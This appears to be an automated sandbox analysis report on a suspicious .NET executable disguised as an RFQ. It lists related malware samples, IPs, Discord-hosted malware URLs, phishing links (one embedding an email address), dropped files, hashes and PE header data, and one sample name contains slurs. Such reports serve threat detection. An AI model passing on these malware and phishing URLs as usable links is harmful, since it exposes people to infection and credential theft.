                  • cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
                  Teklif Rusya 24 09 2020.docGet hashmaliciousBrowse
                  • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  cdn.discordapp.comDOCUMENTO DE CONFIRMACION PSE.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  ICPO07082299976.docGet hashmaliciousBrowse
                  • 162.159.134.233
                  3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  DECLARATIE EXPORT UK1RO-0108DSV_0381.exeGet hashmaliciousBrowse
                  • 162.159.130.233
                  FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exeGet hashmaliciousBrowse
                  • 162.159.133.233
                  Document.pdf.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  filedata.exeGet hashmaliciousBrowse
                  • 162.159.130.233
                  CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  AB479D019576EFD4DD391E0BF3FC1BEDB10367E1ECE71.exeGet hashmaliciousBrowse
                  • 162.159.130.233
                  W6EwiWgNYe.exeGet hashmaliciousBrowse
                  • 162.159.129.233
                  F0Zluo0VUe.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  tmpuB1xoC.vbsGet hashmaliciousBrowse
                  • 162.159.133.233
                  7287980C1AFB840A7438471126C0C95C36FEFA79A013F.exeGet hashmaliciousBrowse
                  • 162.159.130.233
                  Contract - Wipak Oy.xlsxGet hashmaliciousBrowse
                  • 162.159.129.233
                  3CzQDO1WLI.exeGet hashmaliciousBrowse
                  • 162.159.133.233
                  57lsAxwpQZ.exeGet hashmaliciousBrowse
                  • 162.159.130.233
                  DOCUMENTO DE IMPUESTO PREDIAL.exeGet hashmaliciousBrowse
                  • 162.159.130.233
                  SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                  • 162.159.129.233
                  Plasma.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  e4.exeGet hashmaliciousBrowse
                  • 162.159.129.233
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  AWMLTNL7QKHAazb7CGet hashmaliciousBrowse
                  • 109.206.241.200
                  iDBG5zauDpGet hashmaliciousBrowse
                  • 109.206.241.200
                  bmkW2SeYlMGet hashmaliciousBrowse
                  • 109.206.241.200
                  W6GkNvwsFQGet hashmaliciousBrowse
                  • 109.206.241.200
                  8csaVSyOL3Get hashmaliciousBrowse
                  • 109.206.241.200
                  c3sjToJqn7Get hashmaliciousBrowse
                  • 109.206.241.200
                  08QmkdUS4OGet hashmaliciousBrowse
                  • 109.206.241.200
                  W9BzYpUe5XGet hashmaliciousBrowse
                  • 109.206.241.200
                  7vhbMpslIGGet hashmaliciousBrowse
                  • 109.206.241.200
                  FyUl1j2cXjGet hashmaliciousBrowse
                  • 109.206.241.200
                  34ePCj9J1FGet hashmaliciousBrowse
                  • 109.206.241.200
                  Dc08q46S8UGet hashmaliciousBrowse
                  • 109.206.241.200
                  ICPO07082299976.docGet hashmaliciousBrowse
                  • 109.206.241.81
                  cH4gky4gfDGet hashmaliciousBrowse
                  • 109.206.241.211
                  oWklLGZuSuGet hashmaliciousBrowse
                  • 109.206.241.211
                  nSXSa4dSNDGet hashmaliciousBrowse
                  • 109.206.241.211
                  SYqwUjX1nAGet hashmaliciousBrowse
                  • 109.206.241.211
                  Qq1Rxis6vKGet hashmaliciousBrowse
                  • 109.206.241.211
                  P4RpqfkkF7Get hashmaliciousBrowse
                  • 109.206.241.211
                  d4dyUKBiRoGet hashmaliciousBrowse
                  • 109.206.241.211
                  CLOUDFLARENETUShttps://express.adobe.com/page/YKpVz6kiHNMnD/Get hashmaliciousBrowse
                  • 188.114.97.3
                  Erbium@niggerkike(1).exeGet hashmaliciousBrowse
                  • 172.67.214.110
                  Erbium@niggerkike(1).exeGet hashmaliciousBrowse
                  • 172.67.214.110
                  TR0627729920002.exeGet hashmaliciousBrowse
                  • 188.114.97.3
                  https://issuu.com/rahimidds/docs/payment_advise?fr=sOTVkYTUyNjY3MjQGet hashmaliciousBrowse
                  • 104.17.25.14
                  https://saray.com.cn/cplmpaqslzhfxhrbpfxwqeyklibmxZ2VuLXBhZ2V4LW15bWp0c2lxZ3lmb3lvd3l6dnpoa255d2ZpZmV0Y2h4bWl0Y2hlbGwuYnJvd25pc2VjdXJlZHhhc3BlbmxlYWZlbmVyZ3kuY29tGet hashmaliciousBrowse
                  • 104.17.24.14
                  https://storageapi.fleek.co/164a703a-02a8-44b6-80a1-ca5039e01a2b-bucket/index.html#?email=pwilliams@pfcu.comGet hashmaliciousBrowse
                  • 104.17.25.14
                  Benefit_enrollment_08377463.htmGet hashmaliciousBrowse
                  • 104.17.25.14
                  SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfGet hashmaliciousBrowse
                  • 66.235.200.170
                  https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2BON0wZdo6Krvt87xgHH2wq7q76CjP4rwdTyjMymsvVQZCxTr-2BrMfMw6qKvghyIET4-3DgSx9_I7Qk3A2uQ8LXZnFWLHn8NGmOj0e12gLCrQBMxtq5mwqpFA5dVXp-2FLcxQ5jJWd1hqVirQrjX3-2BggEEBN-2F9-2Fq2RjKY3qLsVI0LzgBzNNSnqmzZmKETE9vO3g0Lj-2F7Bo76ctBoOfi0VrajAjVOhntr-2FB-2FnmqXdBpGoecANNPnI1XSxrBt7Q6tizRgFnTGciedfqX7q9qf6iwnx-2B2b2AQwki4B0xGxz8ey6JheNKDLofRVU-3DGet hashmaliciousBrowse
                  • 104.17.25.14
                  https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2FNNksxCYlCfwKrRsBm3JOU7I14nxFnSIreiFHkQp0bvtrLsL8lLOEXDbk4owTsoKg-3DQPK8_GPSrddeDfhddW9pFoFhVDbWOQu7iyaT84Z3rGxxzDX5zOUziT4pGmdfe-2Fbl79QRgM6qGm9Wezxoa-2F8BOhz6c1Uz19NgxtmSoRv6IN4hUYbd8JAbUAn6Y4fQ61GK7skPRiNoRQBKwvmB7vfpH0rTi7qi0qS1KbkGRVoAj4SoncvCUjpsEtuan4xKXPAP0PvrjaAATpp8tEfuXHSQDO3DJwjUsR5GCgTPGIKzC3IgEwz4-3DGet hashmaliciousBrowse
                  • 104.17.64.14
                  https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2Ft-2BI-2BWdnapLwZaldGDfS7Hzp6-2BmLLXtY-2BKqdtluF3jEAa5yE5n-2FItM4tNQxCj05OhOADjByD9574J3m5d1GmPXSY7h82Aa2Akecy-2FdU1i4bqkz5IrM4nTV9tdx0tOLiFZuRvTG5FJGGZ1JkzvS-2FVEQ-3DsK_o_MDI6agRqhN5svOHRSDA7eZuKi4uFyPzTFD1vjcTk1IBg4i5bsEwnQokJNpSrAXVd-2BLJ0Tu5il1njeX-2BBg-2BTy35kp6sLlAo6uJKs05vFRp0l-2Fa7u2iEh5RdyWMH2MfSV3IL0Op4TPsHTYwsgJRgms5gC1ywl-2F62PAwUEmIe2Q0awgyUDBgTDdBoIfFprcaIJFffcOF1rQ-2BTK6f2pYeT8iDHz-2FBoH-2FN17ySL7ucYd0D4o-3DGet hashmaliciousBrowse
                  • 104.18.11.207
                  DOCUMENTO DE CONFIRMACION PSE.exeGet hashmaliciousBrowse
                  • 162.159.134.233
                  Unclear Proforma Invoice.vbsGet hashmaliciousBrowse
                  • 104.21.39.116
                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fu27327601.ct.sendgrid.net%2fls%2fclick%3fupn%3dfULIR8E9Fo6u8OA-2BYAXhc-2Ft-2BI-2BWdnapLwZaldGDfS7Hzp6-2BmLLXtY-2BKqdtluF3jEAa5yE5n-2FItM4tNQxCj05OhOADjByD9574J3m5d1GmPXSY7h82Aa2Akecy-2FdU1i4bbO12YuEY8ipo-2BRVeNDawl-2BwPDqskRhuHhOHG9c-2Fm7Gw-3DzFOe_vN750sXTiuVUpTx8JW5BwW0XbEMxWWlxA4ijxHmxf2b5I2UcuHOBN-2FV9KAoJzsJcEhTNV6ONW5GJcyujJV5KrmdsuJHHE6ucknYLD9S-2FFKjtdLWUSwvR-2BseXhYEF-2Bc74Wf4v1OC2TSbvAOKlYznighIhywBixOnslQeh4-2FDHHdw5u17J4on7oNl9jBIN40ALf4MxVNmsLgGDQBBRR-2F0nNg-2BxnlEKLBErYcmoCpIco0M-3D&c=E,1,L11H5-8bfxXAkL9fWLoe4mjKFfvO2utl2BzB8mgZ4JcbTEoYwuiSyFkeu8Bl4kCo43_RYlJ9IDinVwRRx_kL9d1tz2RYUzIkog0fJ4i_WBnJgVEqI29M&typo=1Get hashmaliciousBrowse
                  • 104.18.11.207
                  http://info.dnfcorp.com/unsubscribe/u/81/58adb727bfae91e4e5663f2a60e63649d32bc35a666c219d6a926e0ab5bfef85/1088736175Get hashmaliciousBrowse
                  • 104.18.11.207
                  https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2BCFh6HEHI4o81Fh-2FVY8oBuVvbqhUVl98-2Fx8Ghn8qfT8WcwUpVuz4UgF5ymH-2BBXJU0-3DUCCo_YMJdYxCsbA3IVx986czIdfoAlJFC3wbeDJ3VEpZJ-2BRI9aloPf6W6lFzLERI9AfXKRTERIdI8AvT-2FOTPhMMJrfvrNUD7C6mKmFLSyHZ08ShAzsrzpp-2F-2BUG1v0abbl5IUi5dzO-2BcoBFm6J28mSDs7Jz-2FnWtkCDCj-2F6QjyUDnjdlyGEEMfoqgrWDjDvwDGG6ERHR18v8yTdiaaXkUCRm5jPTuwI2Ov7k3xb8lkYobqCfTc-3DGet hashmaliciousBrowse
                  • 104.17.25.14
                  http://info.dnfcorp.com/e/81/stonefly-private-cloud-storage/58rdcn/1088736175?h=jRwiY1bIrVps8EcmKqQ_hSGPvJ00ulzmrHVEaQrxL88Get hashmaliciousBrowse
                  • 172.67.38.66
                  ICPO07082299976.docGet hashmaliciousBrowse
                  • 162.159.134.233
                  http://okaloosaclerk.loyaltyhn.com/#.aHR0cDovL2Z1ZWd1aWxsb3MuY2wvd3AtaW5jbHVkZXMvaW1hZ2VzL3NtaWxpZXMvenovP2U9dHdpbGNveEBva2Fsb29zYWNsZXJrLmNvbQ==Get hashmaliciousBrowse
                  • 104.18.10.207
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0ehttps://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2FNNksxCYlCfwKrRsBm3JOU7I14nxFnSIreiFHkQp0bvtrLsL8lLOEXDbk4owTsoKg-3DQPK8_GPSrddeDfhddW9pFoFhVDbWOQu7iyaT84Z3rGxxzDX5zOUziT4pGmdfe-2Fbl79QRgM6qGm9Wezxoa-2F8BOhz6c1Uz19NgxtmSoRv6IN4hUYbd8JAbUAn6Y4fQ61GK7skPRiNoRQBKwvmB7vfpH0rTi7qi0qS1KbkGRVoAj4SoncvCUjpsEtuan4xKXPAP0PvrjaAATpp8tEfuXHSQDO3DJwjUsR5GCgTPGIKzC3IgEwz4-3DGet hashmaliciousBrowse
                  • 162.159.135.233
                  DOCUMENTO DE CONFIRMACION PSE.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  NEW ORDER.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  SecuriteInfo.com.Variant.Tedy.181709.30142.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  SecuriteInfo.com.W32.AIDetectNet.01.27962.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  DECLARATIE EXPORT UK1RO-0108DSV_0381.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  OFFER NO. 007 DATE 04.08.2022 2435676.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  request.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  SecuriteInfo.com.Variant.Tedy.183368.2454.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  SecuriteInfo.com.W32.AIDetectNet.01.4744.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  PO79330.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  AA1878F26132481B357627A0EF684FF68763E6E315FCE.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  j4SGb5BB2X.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  rust-stealer-xss.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  dEsUpmoJDb.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  Document.pdf.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  VPO - SP.9686 Flex rev 2 - BL65338.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  filedata.exeGet hashmaliciousBrowse
                  • 162.159.135.233
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.6393385909655186
                  Encrypted:false
                  SSDEEP:96:i7FQwFaU4mlEnhLaoI7R06tpXIQcQvc6QcEDMcw3Dz+HbHsZAXGng5FMTPSkvPkp:sMUNZHBUZMXwjl/u7sjS274Ith
                  MD5:4A2F4133805443E018DA36B49FC03F34
                  SHA1:6E47527F972DC5ED8E6497ECC05948F6AE924205
                  SHA-256:281EB3490D4A4E92EF8765B3F2ABAC4FD6F7DF8603A2C12B65F3070140A04D4D
                  SHA-512:28D5A7ED5B285A1D62574C77BE21B338E5F7723A01946F3B0738C85EFB977973B4A939660F1F461ED5D65D5D4329E9CC18452066702791CEEE0049BFD0CE678B
                  Malicious:true
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.4.4.6.3.6.7.3.0.7.2.6.1.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.4.4.6.3.6.7.4.1.6.6.3.8.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.c.3.b.e.6.5.-.9.b.d.b.-.4.d.4.7.-.9.e.8.b.-.7.9.6.e.8.b.b.e.7.0.f.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.b.f.3.0.d.a.-.1.6.0.3.-.4.4.6.9.-.9.d.2.f.-.2.1.0.b.b.0.d.9.2.8.a.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.F.Q.-. .7.0.7.5.-.T.6...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...C.o.d.e.A.n.a.l.y.s.i.s...H.o.s.t.i.n.g...S.e.r.v.e.r...F.e.a.t.u.r.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.3.8.-.0.0.0.1.-.0.0.1.c.-.7.e.c.3.-.b.5.6.5.6.4.a.b.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.0.c.7.9.6.d.1.9.9.9.9.4.3.2.6.6.1.0.6.d.b.3.2.9.6.b.9.0.2.2.d.0.0.0.0.0.0.0.0.!.0.0.0.0.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Mon Aug 8 20:21:13 2022, 0x1205a4 type
                  Category:dropped
                  Size (bytes):18920
                  Entropy (8bit):2.005802278010256
                  Encrypted:false
                  SSDEEP:96:5Yv848NGYC92ei7wrDvffjXMgz6341Jt/5E8cWInWIXmIxCOEe:vnU2eO+ffjXMgz6o1JhqvCO5
                  MD5:EA20FD32C6F3E7D2A8C48758D50B079B
                  SHA1:08C7603C9279364C1638183912D94908914E1158
                  SHA-256:9E4AE1B750E6B3924CFE1A432337921CF131EC9EA46EDE77ECE53B946A524557
                  SHA-512:D90E3247A5B8850B358A2B0FC2F0E1E654574C53AB3A849C4BC086F82CD32A3F8316CCAB0807ABBDB610EA23543AFEE0A254068F7483C512C5FD44CF381E701B
                  Malicious:false
                  Reputation:low
                  Preview:MDMP....... .......9p.b............4...............<.......D...............T.......8...........T...........@....B...........................................................................................U...........B......t.......GenuineIntelW...........T.......8...5p.b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8394
                  Entropy (8bit):3.704936696963994
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNibx6Q3J6Yzs60gmfKS/+prb89b7asfHpm:RrlsNid6G6Y460gmfKS375fk
                  MD5:AE2C8BF0B857061480F96C3B059566BD
                  SHA1:D03DE39324E66834BF4CC7D724FB6DA6C4D2A123
                  SHA-256:7D7F02A70976320968835BF4FC0FA302823BA2103978A31F46A18EAB79950DF5
                  SHA-512:1D3B6D2D4FC5C3D6A8719BA5A1F54BB83EA93D600E9E01763F9B3BB80996CD882BFC1E922CA478CBD8A1A0C16A8F3B28EF54551C4ED3FD04543532E1731B0037
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.3.2.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4815
                  Entropy (8bit):4.509067637706721
                  Encrypted:false
                  SSDEEP:48:cvIwSD8zsdJgtWI9HnWgc8sqYjY8fm8M4JxBMFn+q8veBMThrcMU+HPOd:uITf30WgrsqY5J/yKaMTlcMU+Hmd
                  MD5:682B0CF4E02378403E151C14E0E77C76
                  SHA1:E5983608BCCEF3A47A98B22C1BD94A3B0A33A6F1
                  SHA-256:9D5EF79FA022320393BCAFC32AD3B4C4E4A80DB416CEB16C8C93A90D30D5DE16
                  SHA-512:660307A3A7D3AE3536E6FF842893BD8B41E3A6946A8634C8B02D8684D9FBED8E7EF180ED99A8097B051CD39AF3E7B641DEB9B21984DF01894FFD52EE4E0995AF
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1639051" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                  Process:C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1039
                  Entropy (8bit):5.365622957937216
                  Encrypted:false
                  SSDEEP:24:ML9E4Ks2f84jE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXfvjHKnYHKhQnoPtHoxHhAHKzva
                  MD5:1267CD27EC2E67CA2B2E742DD88C7CF1
                  SHA1:6A2022D6A0C73046E75B2E098276E45F826CE34B
                  SHA-256:8A41B61B597A5946BFE4FEB3FD01DD3B3260CBB1385772947D183D3AE1CEB67C
                  SHA-512:4E7F0822BD717835F7AC806244A36EC0A1CF5ECB2B8614D7248FE0C89FCDF89ABB3BF6DBF763F09D4EDBC050E8E2377E7E014FF4E8715CE47D965811A2AA55C5
                  Malicious:true
                  Reputation:low
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b880
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):4.710107307949913
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:RFQ- 7075-T6.exe
                  File size:7680
                  MD5:d9761200032232025041ea4e1f7d0ae2
                  SHA1:bbebd24b01671f232d6e8552fd0b6ff43f22a2f6
                  SHA256:d5880984d7995779a57c6d76f84fa336ab7346560689ea406205544fe0f038c1
                  SHA512:f069c63899a630dcb22b33342ba57b112db451a75131619a6f0b5d7e297cbce6c8cdffe1cce4d62c442e8dcb030e080d6159b0f3a0a2089f7df42155d82ff473
                  SSDEEP:96:Tp6KJCFA38f9Utq0iO+I+PmH/lbjiCeQu+E8380Y516lkrqgI+MJXzNtI:t6u49U4Is2KCeb58380Y51/EZJBO
                  TLSH:A0F1EA17E3DC877AD87A8F311C72524A5B79A682DD27CB6E1D8801499C873D44B52FB0
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...UI.b.............................3... ...@....@.. ....................................@................................
                  Icon Hash:00828e8e8686b000
                  Entrypoint:0x40330e
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x62F14955 [Mon Aug 8 17:35:17 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x32c00x4b.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x578.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
